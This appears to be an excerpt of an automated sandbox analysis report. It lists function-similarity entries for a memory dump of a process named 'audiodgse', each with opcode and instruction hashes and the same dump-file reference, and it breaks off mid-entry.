                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 107a9f8d7d16468355a40fd9991582fa0be30dc1b9ba5ed63044f42706617ee0
                                                                                • Instruction ID: a5680150b93e99bd56836a83f47ac5d2afb930f430c34e7ca024249c55d7f444
                                                                                • Opcode Fuzzy Hash: 107a9f8d7d16468355a40fd9991582fa0be30dc1b9ba5ed63044f42706617ee0
                                                                                • Instruction Fuzzy Hash: 1C32A271A20216CFDB25CF68C480BAEB7F5FF48310F144669EA55AB392D774E891CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                • Instruction ID: 7045856fbe65c251537438e7486152b9a9170a41881394bcd2d91f157d4f73b2
                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                • Instruction Fuzzy Hash: DEF19271E2125B9BDB15EF99C580BAEBBF5AF48714F08812DEA05AB380E774D841CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b48b287e2da698b2470e196910ca0715e3a425724b821b00f37a278a6857970d
                                                                                • Instruction ID: 9df10f135b9b8eae862da54ce4457f39dce5b3c1293539b580d5229399e37c5c
                                                                                • Opcode Fuzzy Hash: b48b287e2da698b2470e196910ca0715e3a425724b821b00f37a278a6857970d
                                                                                • Instruction Fuzzy Hash: 48D1C072A2060A9BDF19CF69C841BBEF7F1AF88304F18817DDA55E7241E735E9058B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20fd7b0ff0fb54c1a6ddcd48a8359d90e35286f66cd5ac2772c12b62c4fa660d
                                                                                • Instruction ID: ab27086be3f0cd67e1fb76e6a4b98903ae10291ea7aa266e82f057480fa805da
                                                                                • Opcode Fuzzy Hash: 20fd7b0ff0fb54c1a6ddcd48a8359d90e35286f66cd5ac2772c12b62c4fa660d
                                                                                • Instruction Fuzzy Hash: 0EE1C171519342CFC715CF28C090A6ABBE4FF89304F048A6DEA9987391EB75E945CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6469e81aa2baf7f714aa9c5d56cf38c2269be28c788b26b7d6c88126b1a5f80
                                                                                • Instruction ID: d61eb2cf389abbba26802918062e8ef24bec82639a57e3a7d790e549edca9cf2
                                                                                • Opcode Fuzzy Hash: d6469e81aa2baf7f714aa9c5d56cf38c2269be28c788b26b7d6c88126b1a5f80
                                                                                • Instruction Fuzzy Hash: C0D1D275A2020BDFDB58DF2AC8C1ABA77A5FF54344F044629EE16DB280E7B0E951CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                • Instruction ID: 0354ce6f314f0c9fd9216a054bd8e60f924c41713020453da3333d6198891ac5
                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                • Instruction Fuzzy Hash: 58B19674A106069FDF24DF99C944EBBBBF9FF85304F50445EAA8297790DA34E905CB10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                • Instruction ID: f28a19fe5722b65edf4cd93533c9f0a81ee04aeb8a1cabbc7b1ea1c8e0451a73
                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                • Instruction Fuzzy Hash: A1B13331620646AFDB25DB68C850BBFBBF6BF89700F140259E742DB281DB30E945CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f40ae2939a2baafc1228ece055c48cd3a4087aec378196cf57a95f2488e0d9c2
                                                                                • Instruction ID: d14f757d623eddd3b369420436267cdfa742d55e086825723e62433e3c6a2a19
                                                                                • Opcode Fuzzy Hash: f40ae2939a2baafc1228ece055c48cd3a4087aec378196cf57a95f2488e0d9c2
                                                                                • Instruction Fuzzy Hash: 6FC16874128342CFD764CF19C485BAAB7E8FF88704F44496DEA8987291D774EA48CF92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5c0d282e47578d06dcd5f47bf82019be73aec614f9887d1d6b9eb7c7781e59a1
                                                                                • Instruction ID: ebe16fc20a806c6b0160aca5ef16c9de27026d37ecda2f86a8a14aee219ea964
                                                                                • Opcode Fuzzy Hash: 5c0d282e47578d06dcd5f47bf82019be73aec614f9887d1d6b9eb7c7781e59a1
                                                                                • Instruction Fuzzy Hash: B9B18270A202668BDB74DF58D880BB9B3F5EF44744F0485E9D90AEB241EB70DD85CB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c8620edb20d960fbbdf244253d9fbb23200b141188b63fb082dfdc167e97ab0d
                                                                                • Instruction ID: 89fdfc6690fd84f47bfa23898515896bd01f655202e8d67346a2bdcaece0f725
                                                                                • Opcode Fuzzy Hash: c8620edb20d960fbbdf244253d9fbb23200b141188b63fb082dfdc167e97ab0d
                                                                                • Instruction Fuzzy Hash: 02A15B31E212569FEB21EB5CC944BAEBBB5BF04B14F060215EB11AB2D1D7749D40CBD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5ee859d89ee539a7fde0a6f07bb1e8107d02f18253316e0de0dc25bb5af1f297
                                                                                • Instruction ID: c1283ff05a5b5a0e846a26d2367059ce68f6777c35d1f0c57c3b98a162349997
                                                                                • Opcode Fuzzy Hash: 5ee859d89ee539a7fde0a6f07bb1e8107d02f18253316e0de0dc25bb5af1f297
                                                                                • Instruction Fuzzy Hash: A0A1EE70B207069FDB24DF69C890BBAB7A5FF54318F404029FB05A7282EB74E855CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b7d4f09df96a0b938f46ce70ba3ab8258286bf61c74d4913bdc4d289282516c
                                                                                • Instruction ID: 2637c4f178becd1d7ed73cb80e01a329469a787c59ef46531c32e781faf9bab0
                                                                                • Opcode Fuzzy Hash: 1b7d4f09df96a0b938f46ce70ba3ab8258286bf61c74d4913bdc4d289282516c
                                                                                • Instruction Fuzzy Hash: FBA1EF72A14212DFD712DF28C980B2ABBE9FF88718F450A2CF5459B650D335EC00CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                • Instruction ID: 398835c5ef1ab9fe39093a0c1a895e5f1ee1972a1d5b489b4fc7ef09cc289a4d
                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                • Instruction Fuzzy Hash: B8B13B71E0061ADFDF19CFADC880AAEB7B5FF88314F148169E925A7354D730A941CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e9d349b4dae70945cee0657972bea9d2b0c95da7ae7fdf638cf174d141ee43f7
                                                                                • Instruction ID: 220dd53b9b6c8bd9713395d06bdb9c5338a4875f9fa5dd575a02a1aaaf870fe3
                                                                                • Opcode Fuzzy Hash: e9d349b4dae70945cee0657972bea9d2b0c95da7ae7fdf638cf174d141ee43f7
                                                                                • Instruction Fuzzy Hash: 14919171D20216AFDF15CFA8D888BBEBFF5AF58710F554169EA10AB341D734E9009BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 28400931fd613ab8181a8b95ecad591d8c847c2f7d8dc157cf8b7e89007fd072
                                                                                • Instruction ID: b3cccd1270f543f1ca74a3ae638242b31a7a6ca557022985b04cb88476b5db13
                                                                                • Opcode Fuzzy Hash: 28400931fd613ab8181a8b95ecad591d8c847c2f7d8dc157cf8b7e89007fd072
                                                                                • Instruction Fuzzy Hash: 0F915671A20616CBEB24DB6CD441BBB7BA1FF94B14F0642A9EF059B380E634D941C7B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                • Instruction ID: 0450e4a93ac3b994fc61e31d60568ab52e0f796fbcfa3d226997b8c0dee5c706
                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                • Instruction Fuzzy Hash: B5819131A0022A9FDF19DF98C890AAEBBF6FF84314F188569D916DB785D734E901CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 846b6f58dcd0d77ce65c75d4f2cdbb92756b35cfe7da8deef7d44d8499cc7bc0
                                                                                • Instruction ID: a6a4840b8ce04554a425b179b225bc72d957f2e2fa4197867cf0a5a2d27e2bac
                                                                                • Opcode Fuzzy Hash: 846b6f58dcd0d77ce65c75d4f2cdbb92756b35cfe7da8deef7d44d8499cc7bc0
                                                                                • Instruction Fuzzy Hash: 8D817E71A1060AEFDF25CFA9C880BEEBBBAFF48314F114429E655A7250D770AC45CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 54f739dab2925073f133b1e765ac409ee5b6c8b54233619a1e206742612ef24e
                                                                                • Instruction ID: 5dee363bdf4cd5713e0d74718ab4cbefe61d8f8e9ea4453493da97b1e38d8b83
                                                                                • Opcode Fuzzy Hash: 54f739dab2925073f133b1e765ac409ee5b6c8b54233619a1e206742612ef24e
                                                                                • Instruction Fuzzy Hash: FB71C2B5C25666DFCB298F68D4917BEBBB4FF58B10F14821EEA42A7350D7709810CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fdf01702af6e8c1072267116166ae4c72cb6f465d67d367c5f67f14a4bc403ef
                                                                                • Instruction ID: a308f8e15ea9acb13ce189b64f565b529b0d422c2010991866653f754218cf06
                                                                                • Opcode Fuzzy Hash: fdf01702af6e8c1072267116166ae4c72cb6f465d67d367c5f67f14a4bc403ef
                                                                                • Instruction Fuzzy Hash: 387192B1900305EFEB24CF59DA41EAABBF9FF80708F51465AE604AB25CD7318944CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 53bf2d1adeb1e8a7ca81b613911d7a75af33b5f272f4b1a8be7d4f26f6a1ee5e
                                                                                • Instruction ID: dc9fcbc262a63042682171013a45e4f9949c5954ae302b8d7da8047137189c9e
                                                                                • Opcode Fuzzy Hash: 53bf2d1adeb1e8a7ca81b613911d7a75af33b5f272f4b1a8be7d4f26f6a1ee5e
                                                                                • Instruction Fuzzy Hash: 9171CE35624242CFD316DF2CC480B2BB7E5FF84710F0485AAE9988B356DB78D886CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                • Instruction ID: e746f46cea3236f2397ff20df7604a9a4d5bb39f2b505782f93a2d56e2e6a3c1
                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                • Instruction Fuzzy Hash: 1B716E71A1060AEFDB10DFA9C944EAEBBF8FF58300F504569E505E7250DB70EA02CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77ff5ac484777c5f1bb466f216037b8eef85d9c538ac0c77d99472b49ab12710
                                                                                • Instruction ID: 721deea3d3fa74b296ebc7d8152817b640d60d66d6abd7dc95fd2d02b3c7a302
                                                                                • Opcode Fuzzy Hash: 77ff5ac484777c5f1bb466f216037b8eef85d9c538ac0c77d99472b49ab12710
                                                                                • Instruction Fuzzy Hash: 0271C132260702AFE732DF18C845F66FBA6EB44720F14492CE756976A0D775E944CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3bb02c6a203ef68b0cd0a2504f15e0910b8720ee23c38a0d344822e7c6a748d5
                                                                                • Instruction ID: a21565d31145224cd0a450975cf7552750717c5064fd9497fa3e8fae0beeb6af
                                                                                • Opcode Fuzzy Hash: 3bb02c6a203ef68b0cd0a2504f15e0910b8720ee23c38a0d344822e7c6a748d5
                                                                                • Instruction Fuzzy Hash: F1819271A24316CFDB24CF5CD584B6D77BABB48B14F15422DDB00AB285EB749D81CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 314569a6865acc1fe70114a96329b9a85a48eccd3cc2e4df05f6285b45468b27
                                                                                • Instruction ID: 309c1ba4e59216023cda59bfe60fd71f0f3dd196f47df7488d9bcd20c6f2ccc1
                                                                                • Opcode Fuzzy Hash: 314569a6865acc1fe70114a96329b9a85a48eccd3cc2e4df05f6285b45468b27
                                                                                • Instruction Fuzzy Hash: 6E711A71E10209EFEB15DF94C841FEEBBB9FF44364F104269F611A6290E774AA05CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 299eac580ecc62fce415392a1b07b31ce39823765eb18fa044287e62d1c19e34
                                                                                • Instruction ID: 409322a285907e6ef1ad6bc4a3f43e2c929788bc7c7c1e85e0f2039cb6b9f00f
                                                                                • Opcode Fuzzy Hash: 299eac580ecc62fce415392a1b07b31ce39823765eb18fa044287e62d1c19e34
                                                                                • Instruction Fuzzy Hash: AF51F272505782AFD716DE68C844F6BB7ECEBC8718F000929BA40EB254DB70ED04C7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dd84c17f7a1097b24c3a09e1d1cc59bc3b16f41e3335de1ea66542a507aabbb2
                                                                                • Instruction ID: dfe8874ae381b561024fe5a25eaba248dcb029bac5ac02d70fa8bf09a6d63cba
                                                                                • Opcode Fuzzy Hash: dd84c17f7a1097b24c3a09e1d1cc59bc3b16f41e3335de1ea66542a507aabbb2
                                                                                • Instruction Fuzzy Hash: AC51CF70900B05DFD722DF5AC890AABFBF8BF94718F10465ED29267AE0C770A545CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e881e70009ff8d2198fbbb043ab65afac9f9a708d9132cf132811054051f6c72
                                                                                • Instruction ID: 2cac66e469d149faff183f988e2b5283b3d9f74af3288f0a0556d472b0da355e
                                                                                • Opcode Fuzzy Hash: e881e70009ff8d2198fbbb043ab65afac9f9a708d9132cf132811054051f6c72
                                                                                • Instruction Fuzzy Hash: 29516B71220A06DFDB22EFA9C980FAAB3F9FF14784F41042DE65697660E734E940DB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8135a7e3b84b157ac51d78b60ba61bc61d9b2b5b782c01d5b21effe4f8f47eb2
                                                                                • Instruction ID: 23dd2f163876be7c79a8ebe0e88fcd99d272c21a1dad9cb65885255b004efa9b
                                                                                • Opcode Fuzzy Hash: 8135a7e3b84b157ac51d78b60ba61bc61d9b2b5b782c01d5b21effe4f8f47eb2
                                                                                • Instruction Fuzzy Hash: E7519B716083029FD755DF29C890A6BB7E5BFC8308F44496DF689C7290E730EA15CB56
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                • Instruction ID: 1bd9b731fc74227166b208c5557d6db4dfc5e489c0b48a2f4861d7e8c127ad36
                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                • Instruction Fuzzy Hash: 6551BC71E1125BAFDF15FF98C440BBEBBB9AF44750F14816AEA01AB280D734D944CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                • Instruction ID: 0f90536aa53a226e7a239871cfa93fbb0fadc317e92aede2143a51dc39e2b494
                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                • Instruction Fuzzy Hash: 1151B831D2021AEFEF21DE94C889BAEBBF9BF04314F56466DD61167290F7709D4487A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3ba421341aed3338d7bfa5437b55e15be83305b268fc6c7d80bb3fdf5bde7caf
                                                                                • Instruction ID: 363f19823fc54534d8a4ff117077baa8fdd8c32bc059f4d995900db049857f1f
                                                                                • Opcode Fuzzy Hash: 3ba421341aed3338d7bfa5437b55e15be83305b268fc6c7d80bb3fdf5bde7caf
                                                                                • Instruction Fuzzy Hash: 0941F5707016319BDB29FB2DC894B7BFBDAFF90628F048699F95587280DB34D801C691
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff7ef069e9d483802e7236c1c9dc04892d67931f2f83a5f974560d3f5449f2e6
                                                                                • Instruction ID: 7e036731e540c70d359036e5d79adf031b953beb3beef24b8abcbc0e0d193be0
                                                                                • Opcode Fuzzy Hash: ff7ef069e9d483802e7236c1c9dc04892d67931f2f83a5f974560d3f5449f2e6
                                                                                • Instruction Fuzzy Hash: 9F51AEB1920316DFCB20DFA9C8849AEBBF9FF48764F904519E605A3304D732AD61CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d199ffeb353c7fd541d0ccb0747f6c1adbe43aef4071dc3ac8e5001d3aa35a4
                                                                                • Instruction ID: 3ebc9601a0e6f6bdd832b3afaa920304284593536becab49065f330c6d54031b
